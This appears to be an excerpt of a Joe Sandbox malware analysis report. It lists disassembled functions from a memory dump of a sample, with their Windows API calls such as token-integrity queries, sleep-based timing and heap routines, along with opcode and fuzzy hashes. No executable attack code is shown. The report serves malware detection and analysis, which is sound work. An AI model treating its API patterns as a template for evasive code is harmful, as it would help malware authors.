                                        • Source File: 00000000.00000002.2022144138.0000000000BF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BF0000, based on PE: true
                                        • Associated: 00000000.00000002.2022114283.0000000000BF0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2022207686.0000000000C8C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2022207686.0000000000CB2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2022261060.0000000000CBC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2022283221.0000000000CC4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_bf0000_DSD876543456780000.jbxd
                                        Similarity
                                        • API ID: ByteCharEnvironmentMultiStringsWide$AllocateFreeHeap_free
                                        • String ID:
                                        • API String ID: 336800556-0
                                        • Opcode ID: 101bd588c8cbd490583602960702c3a20e8b7ffa1d938eaf5c56d2a039db8c35
                                        • Instruction ID: 9a586003a63ff582b9060e1bc87321062253e29d826e3a75ccdd4704b8f13b6e
                                        • Opcode Fuzzy Hash: 101bd588c8cbd490583602960702c3a20e8b7ffa1d938eaf5c56d2a039db8c35
                                        • Instruction Fuzzy Hash: 8501A7726016357F332116BA7CCCE7F796DDEC6BA13160129FD15C7601EA718E0292B5
                                        Function 00C09639 Relevance: 7.6, APIs: 5, Instructions: 66COMMON
                                        Download Yara Rule
                                        APIs
                                        • ExtCreatePen.GDI32(?,?,00000000,00000000,00000000,?,00000000), ref: 00C09693
                                        • SelectObject.GDI32(?,00000000), ref: 00C096A2
                                        • BeginPath.GDI32(?), ref: 00C096B9
                                        • SelectObject.GDI32(?,00000000), ref: 00C096E2
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2022144138.0000000000BF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BF0000, based on PE: true
                                        • Associated: 00000000.00000002.2022114283.0000000000BF0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2022207686.0000000000C8C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2022207686.0000000000CB2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2022261060.0000000000CBC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2022283221.0000000000CC4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_bf0000_DSD876543456780000.jbxd
                                        Similarity
                                        • API ID: ObjectSelect$BeginCreatePath
                                        • String ID:
                                        • API String ID: 3225163088-0
                                        • Opcode ID: b27c912fab62dceb63e61c231e4ce4b9a4d856d163162e74a482b0bcae433234
                                        • Instruction ID: 6f2a1606cf3c4dc831fb83b0fd2c6cf8a915ba066814ec3962536453f50dac5c
                                        • Opcode Fuzzy Hash: b27c912fab62dceb63e61c231e4ce4b9a4d856d163162e74a482b0bcae433234
                                        • Instruction Fuzzy Hash: 7F218E70802305EBDB519F26EC48BAD3BB8FB42765F180216F820A71F2D3719991CFA4
                                        Function 00C55711 Relevance: 7.6, APIs: 5, Instructions: 61COMMON
                                        Download Yara Rule
                                        APIs
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2022144138.0000000000BF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BF0000, based on PE: true
                                        • Associated: 00000000.00000002.2022114283.0000000000BF0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2022207686.0000000000C8C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2022207686.0000000000CB2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2022261060.0000000000CBC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2022283221.0000000000CC4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_bf0000_DSD876543456780000.jbxd
                                        Similarity
                                        • API ID: _memcmp
                                        • String ID:
                                        • API String ID: 2931989736-0
                                        • Opcode ID: f3194cfea4b743fdc9102d15322960e276cbe9070588bbb72ef0a05c01eb24ab
                                        • Instruction ID: a86c1bb83a34ec265d3a827408d4ce51c089c7575823050d82b35cab870c2c28
                                        • Opcode Fuzzy Hash: f3194cfea4b743fdc9102d15322960e276cbe9070588bbb72ef0a05c01eb24ab
                                        • Instruction Fuzzy Hash: 6001F5A9251609BBD21861129D92FFB735C9B263DAF540034FE149A241F720EED593A8
                                        Function 00C22DF8 Relevance: 7.6, APIs: 5, Instructions: 53COMMONLIBRARYCODE
                                        Download Yara Rule
                                        APIs
                                        • GetLastError.KERNEL32(?,?,?,00C1F2DE,00C23863,00CC1444,?,00C0FDF5,?,?,00BFA976,00000010,00CC1440,00BF13FC,?,00BF13C6), ref: 00C22DFD
                                        • _free.LIBCMT ref: 00C22E32
                                        • _free.LIBCMT ref: 00C22E59
                                        • SetLastError.KERNEL32(00000000,00BF1129), ref: 00C22E66
                                        • SetLastError.KERNEL32(00000000,00BF1129), ref: 00C22E6F
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2022144138.0000000000BF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BF0000, based on PE: true
                                        • Associated: 00000000.00000002.2022114283.0000000000BF0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2022207686.0000000000C8C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2022207686.0000000000CB2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2022261060.0000000000CBC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2022283221.0000000000CC4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_bf0000_DSD876543456780000.jbxd
                                        Similarity
                                        • API ID: ErrorLast$_free
                                        • String ID:
                                        • API String ID: 3170660625-0
                                        • Opcode ID: 658182399932a983d0eb1fc33b493929609b0c81347f35a77db38c6f71990b52
                                        • Instruction ID: c75a65920f8786e43a02c42d9f29e9b5eadc214c0e8f3c5483bddb62a59be5e2
                                        • Opcode Fuzzy Hash: 658182399932a983d0eb1fc33b493929609b0c81347f35a77db38c6f71990b52
                                        • Instruction Fuzzy Hash: 8F01F43224562077C61237397C86F7F265DABD53A2B220128F431A2AE3EF74CD017120
                                        Function 00C5000E Relevance: 7.5, APIs: 5, Instructions: 47stringCOMMON
                                        Download Yara Rule
                                        APIs
                                        • CLSIDFromProgID.OLE32(?,?,?,00000000,?,?,?,-C000001E,00000001,?,00C4FF41,80070057,?,?,?,00C5035E), ref: 00C5002B
                                        • ProgIDFromCLSID.OLE32(?,00000000,?,?,?,00000000,?,?,?,-C000001E,00000001,?,00C4FF41,80070057,?,?), ref: 00C50046
                                        • lstrcmpiW.KERNEL32(?,00000000,?,?,?,00000000,?,?,?,-C000001E,00000001,?,00C4FF41,80070057,?,?), ref: 00C50054
                                        • CoTaskMemFree.OLE32(00000000,?,00000000,?,?,?,00000000,?,?,?,-C000001E,00000001,?,00C4FF41,80070057,?), ref: 00C50064
                                        • CLSIDFromString.OLE32(?,?,?,?,?,00000000,?,?,?,-C000001E,00000001,?,00C4FF41,80070057,?,?), ref: 00C50070
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2022144138.0000000000BF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BF0000, based on PE: true
                                        • Associated: 00000000.00000002.2022114283.0000000000BF0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2022207686.0000000000C8C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2022207686.0000000000CB2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2022261060.0000000000CBC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2022283221.0000000000CC4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_bf0000_DSD876543456780000.jbxd
                                        Similarity
                                        • API ID: From$Prog$FreeStringTasklstrcmpi
                                        • String ID:
                                        • API String ID: 3897988419-0
                                        • Opcode ID: 3e7daa301dbbf84e1841d3e8ee606ed667ae7a7e1367f7355d94e371d4206c50
                                        • Instruction ID: 467b19ce65cf86c0c4596c40193fe63e83562521f7bb46600ba8f5ad9f5db072
                                        • Opcode Fuzzy Hash: 3e7daa301dbbf84e1841d3e8ee606ed667ae7a7e1367f7355d94e371d4206c50
                                        • Instruction Fuzzy Hash: 68018B7A600204BFDB104F69DC88BAE7BADEB84793F244124FD05D2290E775DE848BA4
                                        Function 00C5E97B Relevance: 7.5, APIs: 5, Instructions: 47sleepCOMMON
                                        Download Yara Rule
                                        APIs
                                        • QueryPerformanceCounter.KERNEL32(?), ref: 00C5E997
                                        • QueryPerformanceFrequency.KERNEL32(?), ref: 00C5E9A5
                                        • Sleep.KERNEL32(00000000), ref: 00C5E9AD
                                        • QueryPerformanceCounter.KERNEL32(?), ref: 00C5E9B7
                                        • Sleep.KERNEL32 ref: 00C5E9F3
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2022144138.0000000000BF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BF0000, based on PE: true
                                        • Associated: 00000000.00000002.2022114283.0000000000BF0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2022207686.0000000000C8C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2022207686.0000000000CB2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2022261060.0000000000CBC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2022283221.0000000000CC4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_bf0000_DSD876543456780000.jbxd
                                        Similarity
                                        • API ID: PerformanceQuery$CounterSleep$Frequency
                                        • String ID:
                                        • API String ID: 2833360925-0
                                        • Opcode ID: 75ca0a377b9254e746be836ae7ca51267e3655c856a3ba93fdb974db97774e6f
                                        • Instruction ID: 02c7e35cbc9626569363e4505e7ba18eaf40a3687c8a3f53efb7254894fb7cf1
                                        • Opcode Fuzzy Hash: 75ca0a377b9254e746be836ae7ca51267e3655c856a3ba93fdb974db97774e6f
                                        • Instruction Fuzzy Hash: 3C015B35C01529DBCF04ABE5D8897DDBB78FB09302F000546E912B2150DB309699C769
                                        Function 00C510F9 Relevance: 7.5, APIs: 5, Instructions: 46memoryCOMMON
                                        Download Yara Rule
                                        APIs
                                        • GetUserObjectSecurity.USER32(?,00000004,?,00000000,?), ref: 00C51114
                                        • GetLastError.KERNEL32(?,00000000,00000000,?,?,00C50B9B,?,?,?), ref: 00C51120
                                        • GetProcessHeap.KERNEL32(00000008,?,?,00000000,00000000,?,?,00C50B9B,?,?,?), ref: 00C5112F
                                        • HeapAlloc.KERNEL32(00000000,?,00000000,00000000,?,?,00C50B9B,?,?,?), ref: 00C51136
                                        • GetUserObjectSecurity.USER32(?,00000004,00000000,?,?), ref: 00C5114D
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2022144138.0000000000BF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BF0000, based on PE: true
                                        • Associated: 00000000.00000002.2022114283.0000000000BF0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2022207686.0000000000C8C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2022207686.0000000000CB2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2022261060.0000000000CBC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2022283221.0000000000CC4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_bf0000_DSD876543456780000.jbxd
                                        Similarity
                                        • API ID: HeapObjectSecurityUser$AllocErrorLastProcess
                                        • String ID:
                                        • API String ID: 842720411-0
                                        • Opcode ID: 162ffce30e276b562befb3fdc8afd3cabf0a132e5cfa42998c3efa6a8cf561c4
                                        • Instruction ID: a79c42cfad1799e2ccc0e304cf73cd95a155d28918083ecc5f5de3c2cb6126c5
                                        • Opcode Fuzzy Hash: 162ffce30e276b562befb3fdc8afd3cabf0a132e5cfa42998c3efa6a8cf561c4
                                        • Instruction Fuzzy Hash: F1012479200605ABDB114FA4AC8DB6E3A6EEF8A3A1B250458FE4182260DA319D408B64
                                        Function 00C50FB4 Relevance: 7.5, APIs: 5, Instructions: 43memoryCOMMON
                                        Download Yara Rule
                                        APIs
                                        • GetTokenInformation.ADVAPI32(?,00000002,?,00000000,?), ref: 00C50FCA
                                        • GetLastError.KERNEL32(?,00000002,?,00000000,?), ref: 00C50FD6
                                        • GetProcessHeap.KERNEL32(00000008,?,?,00000002,?,00000000,?), ref: 00C50FE5
                                        • HeapAlloc.KERNEL32(00000000,?,00000002,?,00000000,?), ref: 00C50FEC
                                        • GetTokenInformation.ADVAPI32(?,00000002,00000000,?,?,?,00000002,?,00000000,?), ref: 00C51002
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2022144138.0000000000BF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BF0000, based on PE: true
                                        • Associated: 00000000.00000002.2022114283.0000000000BF0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2022207686.0000000000C8C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2022207686.0000000000CB2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2022261060.0000000000CBC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2022283221.0000000000CC4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_bf0000_DSD876543456780000.jbxd
                                        Similarity
                                        • API ID: HeapInformationToken$AllocErrorLastProcess
                                        • String ID:
                                        • API String ID: 44706859-0
                                        • Opcode ID: 391837b5aa09138f533f071aaa7e8ad69b5272d3164c41959653874f44d6639f
                                        • Instruction ID: c2003e15ca83cdb893905221fa13ac31b39e535401622229574ddbf58344b217
                                        • Opcode Fuzzy Hash: 391837b5aa09138f533f071aaa7e8ad69b5272d3164c41959653874f44d6639f
                                        • Instruction Fuzzy Hash: 0FF03739201311ABDB214FA4AC8DF5A3BA9EF8A762F544414FE458A291CA70DC908B74
                                        Function 00C51014 Relevance: 7.5, APIs: 5, Instructions: 43memoryCOMMON
                                        Download Yara Rule
                                        APIs
                                        • GetTokenInformation.ADVAPI32(?,00000003(TokenIntegrityLevel),?,00000000,?), ref: 00C5102A
                                        • GetLastError.KERNEL32(?,TokenIntegrityLevel,?,00000000,?), ref: 00C51036
                                        • GetProcessHeap.KERNEL32(00000008,?,?,TokenIntegrityLevel,?,00000000,?), ref: 00C51045
                                        • HeapAlloc.KERNEL32(00000000,?,TokenIntegrityLevel,?,00000000,?), ref: 00C5104C
                                        • GetTokenInformation.ADVAPI32(?,00000003(TokenIntegrityLevel),00000000,?,?,?,TokenIntegrityLevel,?,00000000,?), ref: 00C51062
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2022144138.0000000000BF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BF0000, based on PE: true
                                        • Associated: 00000000.00000002.2022114283.0000000000BF0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2022207686.0000000000C8C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2022207686.0000000000CB2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2022261060.0000000000CBC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2022283221.0000000000CC4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_bf0000_DSD876543456780000.jbxd
                                        Similarity
                                        • API ID: HeapInformationToken$AllocErrorLastProcess
                                        • String ID:
                                        • API String ID: 44706859-0
                                        • Opcode ID: 414cd176368e2d450e7330c4d972c39fe6d93ec2c9dddee31611a531dca0423d
                                        • Instruction ID: c621a502c35b2a8fb1f2bf86827d7f5e58ed5f143a1638d0fd435a3c524bf11d
                                        • Opcode Fuzzy Hash: 414cd176368e2d450e7330c4d972c39fe6d93ec2c9dddee31611a531dca0423d
                                        • Instruction Fuzzy Hash: C3F03739200311ABDB215FA4EC8DF5A3BADEF8A662F240414FE458A290CA70D9908B74
                                        Function 00C6030F Relevance: 7.5, APIs: 6, Instructions: 41COMMON
                                        Download Yara Rule
                                        APIs
                                        • CloseHandle.KERNEL32(?,?,?,?,00C6017D,?,00C632FC,?,00000001,00C32592,?), ref: 00C60324
                                        • CloseHandle.KERNEL32(?,?,?,?,00C6017D,?,00C632FC,?,00000001,00C32592,?), ref: 00C60331
                                        • CloseHandle.KERNEL32(?,?,?,?,00C6017D,?,00C632FC,?,00000001,00C32592,?), ref: 00C6033E
                                        • CloseHandle.KERNEL32(?,?,?,?,00C6017D,?,00C632FC,?,00000001,00C32592,?), ref: 00C6034B
                                        • CloseHandle.KERNEL32(?,?,?,?,00C6017D,?,00C632FC,?,00000001,00C32592,?), ref: 00C60358
                                        • CloseHandle.KERNEL32(?,?,?,?,00C6017D,?,00C632FC,?,00000001,00C32592,?), ref: 00C60365
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2022144138.0000000000BF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BF0000, based on PE: true
                                        • Associated: 00000000.00000002.2022114283.0000000000BF0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2022207686.0000000000C8C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2022207686.0000000000CB2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2022261060.0000000000CBC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2022283221.0000000000CC4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_bf0000_DSD876543456780000.jbxd
                                        Similarity
                                        • API ID: CloseHandle
                                        • String ID:
                                        • API String ID: 2962429428-0
                                        • Opcode ID: c9638beb51004a665a1796fa7ee2f5ed5851ec15ef53109288efc048434ccca4
                                        • Instruction ID: babd48062b3204506914e654218a7b83bad2f6ad2930cb15ca1fcc53328f3d2f
                                        • Opcode Fuzzy Hash: c9638beb51004a665a1796fa7ee2f5ed5851ec15ef53109288efc048434ccca4
                                        • Instruction Fuzzy Hash: 38019072800B159FC7319F66D8C0817F7F5BE502163258A3ED1A662A31C371AA55DF80
                                        Function 00C2D73A Relevance: 7.5, APIs: 5, Instructions: 40COMMONLIBRARYCODE
                                        Download Yara Rule
                                        APIs
                                        • _free.LIBCMT ref: 00C2D752
                                          • Part of subcall function 00C229C8: RtlFreeHeap.NTDLL(00000000,00000000,?,00C2D7D1,00000000,00000000,00000000,00000000,?,00C2D7F8,00000000,00000007,00000000,?,00C2DBF5,00000000), ref: 00C229DE
                                          • Part of subcall function 00C229C8: GetLastError.KERNEL32(00000000,?,00C2D7D1,00000000,00000000,00000000,00000000,?,00C2D7F8,00000000,00000007,00000000,?,00C2DBF5,00000000,00000000), ref: 00C229F0
                                        • _free.LIBCMT ref: 00C2D764
                                        • _free.LIBCMT ref: 00C2D776
                                        • _free.LIBCMT ref: 00C2D788
                                        • _free.LIBCMT ref: 00C2D79A
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2022144138.0000000000BF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BF0000, based on PE: true
                                        • Associated: 00000000.00000002.2022114283.0000000000BF0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2022207686.0000000000C8C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2022207686.0000000000CB2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2022261060.0000000000CBC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2022283221.0000000000CC4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_bf0000_DSD876543456780000.jbxd
                                        Similarity
                                        • API ID: _free$ErrorFreeHeapLast
                                        • String ID:
                                        • API String ID: 776569668-0
                                        • Opcode ID: e6495e1f72fc18c222f674ea0f2c9fd812b84fbb934b412ff4ad57557b97ac5b
                                        • Instruction ID: ed6abcf8f01b7c3419613e55060379b1382e3568972a5a7554732826f76adfae
                                        • Opcode Fuzzy Hash: e6495e1f72fc18c222f674ea0f2c9fd812b84fbb934b412ff4ad57557b97ac5b
                                        • Instruction Fuzzy Hash: CDF04F32504324AB8621FB64F9C1E1A77DDBB18B10BE40C05F059D7945C734FCC08660
                                        Function 00C55C44 Relevance: 7.5, APIs: 5, Instructions: 40windowtimeCOMMON
                                        Download Yara Rule
                                        APIs
                                        • GetDlgItem.USER32(?,000003E9), ref: 00C55C58
                                        • GetWindowTextW.USER32(00000000,?,00000100), ref: 00C55C6F
                                        • MessageBeep.USER32(00000000), ref: 00C55C87
                                        • KillTimer.USER32(?,0000040A), ref: 00C55CA3
                                        • EndDialog.USER32(?,00000001), ref: 00C55CBD
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2022144138.0000000000BF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BF0000, based on PE: true
                                        • Associated: 00000000.00000002.2022114283.0000000000BF0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2022207686.0000000000C8C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2022207686.0000000000CB2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2022261060.0000000000CBC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2022283221.0000000000CC4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_bf0000_DSD876543456780000.jbxd
                                        Similarity
                                        • API ID: BeepDialogItemKillMessageTextTimerWindow
                                        • String ID:
                                        • API String ID: 3741023627-0
                                        • Opcode ID: 3f0dd93fc809f1183a85cc4bbb1b32d9582479b2979d8ac2ef66cf0bf5cfe5be
                                        • Instruction ID: a74791c25e261aeb27bc50b375c219ab1c178e129517f60a724e55814b16715a
                                        • Opcode Fuzzy Hash: 3f0dd93fc809f1183a85cc4bbb1b32d9582479b2979d8ac2ef66cf0bf5cfe5be
                                        • Instruction Fuzzy Hash: B1018B34500B049BEB205B10DD9EFA977B8BF04706F001569B553614E1D7F069888B58
                                        Function 00C222A0 Relevance: 7.5, APIs: 5, Instructions: 30COMMON
                                        Download Yara Rule
                                        APIs
                                        • _free.LIBCMT ref: 00C222BE
                                          • Part of subcall function 00C229C8: RtlFreeHeap.NTDLL(00000000,00000000,?,00C2D7D1,00000000,00000000,00000000,00000000,?,00C2D7F8,00000000,00000007,00000000,?,00C2DBF5,00000000), ref: 00C229DE
                                          • Part of subcall function 00C229C8: GetLastError.KERNEL32(00000000,?,00C2D7D1,00000000,00000000,00000000,00000000,?,00C2D7F8,00000000,00000007,00000000,?,00C2DBF5,00000000,00000000), ref: 00C229F0
                                        • _free.LIBCMT ref: 00C222D0
                                        • _free.LIBCMT ref: 00C222E3
                                        • _free.LIBCMT ref: 00C222F4
                                        • _free.LIBCMT ref: 00C22305
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2022144138.0000000000BF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BF0000, based on PE: true
                                        • Associated: 00000000.00000002.2022114283.0000000000BF0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2022207686.0000000000C8C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2022207686.0000000000CB2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2022261060.0000000000CBC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2022283221.0000000000CC4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_bf0000_DSD876543456780000.jbxd
                                        Similarity
                                        • API ID: _free$ErrorFreeHeapLast
                                        • String ID:
                                        • API String ID: 776569668-0
                                        • Opcode ID: 81a8ba203af57b5e949a4f8a055164c45e3aafb16b30d2501fa00f236f4e59bb
                                        • Instruction ID: 244834ab95aebad54e0fd2da7901b64ac38185ad76c3848f8c8dd3893d1b3038
                                        • Opcode Fuzzy Hash: 81a8ba203af57b5e949a4f8a055164c45e3aafb16b30d2501fa00f236f4e59bb
                                        • Instruction Fuzzy Hash: DFF05E74800331EB8A12BF94FC41F4C3B64FB1D761B55060AF820D66B2C7360991AFE4
                                        Function 00C095C5 Relevance: 7.5, APIs: 5, Instructions: 29COMMON
                                        Download Yara Rule
                                        APIs
                                        • EndPath.GDI32(?), ref: 00C095D4
                                        • StrokeAndFillPath.GDI32(?,?,00C471F7,00000000,?,?,?), ref: 00C095F0
                                        • SelectObject.GDI32(?,00000000), ref: 00C09603
                                        • DeleteObject.GDI32 ref: 00C09616
                                        • StrokePath.GDI32(?), ref: 00C09631
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2022144138.0000000000BF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BF0000, based on PE: true
                                        • Associated: 00000000.00000002.2022114283.0000000000BF0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2022207686.0000000000C8C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2022207686.0000000000CB2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2022261060.0000000000CBC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2022283221.0000000000CC4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_bf0000_DSD876543456780000.jbxd
                                        Similarity
                                        • API ID: Path$ObjectStroke$DeleteFillSelect
                                        • String ID:
                                        • API String ID: 2625713937-0
                                        • Opcode ID: 3e2f3ec7fde956bdeafff1997c61daa424ef62f8bc2ca562491901914921487b
                                        • Instruction ID: a500d1888db183eccc7ae8c898e6265d1e519d745489da788c945e3b1d00be04
                                        • Opcode Fuzzy Hash: 3e2f3ec7fde956bdeafff1997c61daa424ef62f8bc2ca562491901914921487b
                                        • Instruction Fuzzy Hash: 65F03C30005604EBDB525F66ED5CBAC3B61EB02362F088214F925550F2C7358AA1DF24
                                        Function 00C20F47 Relevance: 7.4, APIs: 2, Strings: 2, Instructions: 389COMMON
                                        Download Yara Rule
                                        APIs
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2022144138.0000000000BF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BF0000, based on PE: true
                                        • Associated: 00000000.00000002.2022114283.0000000000BF0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2022207686.0000000000C8C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2022207686.0000000000CB2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2022261060.0000000000CBC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2022283221.0000000000CC4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_bf0000_DSD876543456780000.jbxd
                                        Similarity
                                        • API ID: __freea$_free
                                        • String ID: a/p$am/pm
                                        • API String ID: 3432400110-3206640213
                                        • Opcode ID: 2fe2f2d8a4c7de847d6979726c7d544bb418ec46b8e928b448cd4732021e48a5
                                        • Instruction ID: a3dd886396c088abfc744a05db435cba34e601ac7db0fecfbcb68f5b710b3e2f
                                        • Opcode Fuzzy Hash: 2fe2f2d8a4c7de847d6979726c7d544bb418ec46b8e928b448cd4732021e48a5
                                        • Instruction Fuzzy Hash: 17D10331900266DACB24CF68E845BFEB7B2EF25310F2C0159ED219BE61D7759E81CB91
                                        Function 00C77B7E Relevance: 7.2, APIs: 1, Strings: 3, Instructions: 230COMMON
                                        Download Yara Rule
                                        APIs
                                          • Part of subcall function 00C10242: EnterCriticalSection.KERNEL32(00CC070C,00CC1884,?,?,00C0198B,00CC2518,?,?,?,00BF12F9,00000000), ref: 00C1024D
                                          • Part of subcall function 00C10242: LeaveCriticalSection.KERNEL32(00CC070C,?,00C0198B,00CC2518,?,?,?,00BF12F9,00000000), ref: 00C1028A
                                          • Part of subcall function 00BF9CB3: _wcslen.LIBCMT ref: 00BF9CBD
